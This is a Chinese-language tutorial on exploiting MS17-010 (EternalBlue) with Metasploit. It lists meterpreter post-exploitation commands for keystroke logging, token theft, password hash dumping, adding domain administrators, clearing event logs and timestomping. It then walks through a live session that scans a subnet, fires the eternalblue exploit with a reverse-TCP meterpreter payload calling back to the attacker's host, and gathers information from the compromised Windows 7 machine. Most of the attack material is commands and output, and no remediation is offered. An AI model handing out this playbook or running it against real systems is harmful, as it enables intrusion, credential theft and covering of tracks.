MS17-010漏洞利用

0x01 引言

2017年4月，网络最为轰动的事件无疑是TheShadowBrokers放出一大批NSA（美国国家安全局）“方程式组织” (Equation Group)使用的极具破坏力的黑客工具，其中包括可以远程攻破全球约70%Windows机器的漏洞利用工具。一夜之间，全世界70%的windows服务器置于危险之中，国内使用windows服务器的高校、国企甚至政府机构也不能幸免。这对互联网无疑造成了一次大地震，因为已经很久没有出现过像MS17-010这种级别的漏洞了，因此就被大家笑语说出了“指哪打哪”这样一个事实。

受影响的Windows 版本包括Windows NT、Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8、Windows 2008、Windows 2008 R2、Windows Server 2012 SP0等。

0x02 前置知识

MSFconsole Commands

• show exploits 查看所有exploit
• show payloads 查看所有payload
• show auxiliary 查看所有auxiliary
• search name 搜索exploit等
• info 查看加载模块的信息
• use name 加载模块
• LHOST 本机IP
• RHOST 目标IP
• set function 设置选项值
• setg function 全局设置
• show options 查看选项
• show targets 查看exp可选的平台
• set target num 设置exp作用平台
• set payload payload 设置payload
• show advanced 查看高级选项
• set autorunscript migrate -f 设置自动执行指令
• check 测试是否可利用
• exploit 执行exp或模块
• exploit -j 作为后台执行
• exploit -z 成功后不立即打开session
• exploit -e encoder 指定encoder
• exploit -h 查看帮助信息
• sessions -l -v 列出可用sessions详细信息
• sessions -s script 在指定session执行脚本
• sessions -K 结束session
• sessions -c cmd 执行指定命令
• sessions -u sessionID 升级shell
• db_create name 创建数据库
• db_connect name 连接数据库
• db_nmap nmap扫描并导入结果
• db_autopwn -h 查看autopwn帮助
• db_autopwn -p -r -e 基于端口，反弹shell
• db_destroy 删除数据库

Meterpreter Commands

• help 查看帮助
• run scriptname 运行脚本
• sysinfo 系统基本信息
• ls 列目录
• use priv 运行提权组件
• ps 列进程
• migrate PID PID迁移
• use incognito token窃取
• list_tokens -u 查看可用用户token
• list_tokens -g 查看可用组token
• impersonate_token DOMAIN_NAME\USERNAME 模仿token
• steal_token PID 窃取PID所属token并模仿
• drop_token 停止模仿token
• getsystem 获取SYSTEM权限
• shell 运行shell
• execute -f cmd.exe -i 交互式运行cmd
• execute -f cmd.exe -i -t 使用可用token运行
• execute -f cmd.exe -i -H -t 同上，同时隐藏进程
• rev2self 返回至初始用户
• reg command 修改注册表
• setkesktop number 切换至另一已登录用户屏幕
• screenshot 截屏
• upload file 上传文件
• download file 下载文件
• keyscan_start 开始截取击键记录
• keyscan_stop 停止截取击键记录
• getprivs 尽可能提升权限
• uictl enable keyboard/mouse 获取键盘或鼠标的控制权
• background 将当前meterpreter shell转入后台
• hashdump 导出所有用户hash
• use sniffer 加载嗅探模块
• sniffer_interfaces 查看可用网卡接口
• sniffer_dump interfaceID pcapname 开始嗅探
• sniffer_start interfaceID packet-buffer 指定buffer范围嗅探
• sniffer_stats interfaceID 抓取统计信息
• sniffer_stop interfaceID 停止嗅探
• add_user username password -h ip 添加用户
• add_group_user “Domain Admins” username -h ip 添加用户至管理组
• clearev 清空日志
• timestomp 改变文件属性如创建时间等
• reboot 重启

0x03 实战

运行MSF

搜索目标

msf > search ms17-010

Matching Modules
================

   Name                                      Disclosure Date  Rank     Description
   ----                                      ---------------  ----     -----------
   auxiliary/scanner/smb/smb_ms17_010                         normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption


msf > use auxiliary/scanner/smb/smb_ms17_010 
msf auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   CHECK_DOPU  true             yes       Check for DOUBLEPULSAR on vulnerable hosts
   RHOSTS                       yes       The target address range or CIDR identifier
   RPORT       445              yes       The SMB service port (TCP)
   SMBDomain   .                no        The Windows domain to use for authentication
   SMBPass                      no        The password for the specified username
   SMBUser                      no        The username to authenticate as
   THREADS     1                yes       The number of concurrent threads

msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.6.100-192.168.6.170
RHOSTS => 192.168.6.100-192.168.6.170
msf auxiliary(scanner/smb/smb_ms17_010) > set THREADS 8
THREADS => 8
msf auxiliary(scanner/smb/smb_ms17_010) > run

[-] 192.168.6.100:445     - An SMB Login Error occurred while connecting to the IPC$ tree.
[-] 192.168.6.105:445     - Host does NOT appear vulnerable.
[-] 192.168.6.112:445     - Host does NOT appear vulnerable.
[*] Scanned 14 of 71 hosts (19% complete)
[-] 192.168.6.115:445     - Host does NOT appear vulnerable.
[-] 192.168.6.119:445     - Host does NOT appear vulnerable.
[-] 192.168.6.118:445     - Host does NOT appear vulnerable.
[*] Scanned 20 of 71 hosts (28% complete)
[*] Scanned 22 of 71 hosts (30% complete)
[-] 192.168.6.122:445     - Host does NOT appear vulnerable.
[-] 192.168.6.133:445     - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] Scanned 35 of 71 hosts (49% complete)
[*] Scanned 41 of 71 hosts (57% complete)
[*] Scanned 49 of 71 hosts (69% complete)
[-] 192.168.6.155:445     - Host does NOT appear vulnerable.
[-] 192.168.6.151:445     - Host does NOT appear vulnerable.
[-] 192.168.6.156:445     - Host does NOT appear vulnerable.
[*] Scanned 55 of 71 hosts (77% complete)
[+] 192.168.6.160:445     - Host is likely VULNERABLE to MS17-010!  (Windows 7 Ultimate 7601 Service Pack 1)
[*] Scanned 58 of 71 hosts (81% complete)
[-] 192.168.6.162:445     - Host does NOT appear vulnerable.
[-] 192.168.6.168:445     - Host does NOT appear vulnerable.
[*] Scanned 68 of 71 hosts (95% complete)
[*] Scanned 71 of 71 hosts (100% complete)
[*] Auxiliary module execution completed

攻击目标

msf auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.6.160
LHOST => 192.168.6.160
msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.6.158
LHOST => 192.168.6.158
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.6.160
RHOST => 192.168.6.160

获取目标信息

meterpreter > sysinfo 
Computer        : �޿�÷
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WorkGroup
Logged On Users : 1
Meterpreter     : x64/windows

截屏,

0x04 总结

公司内网的安全意识还有待提高。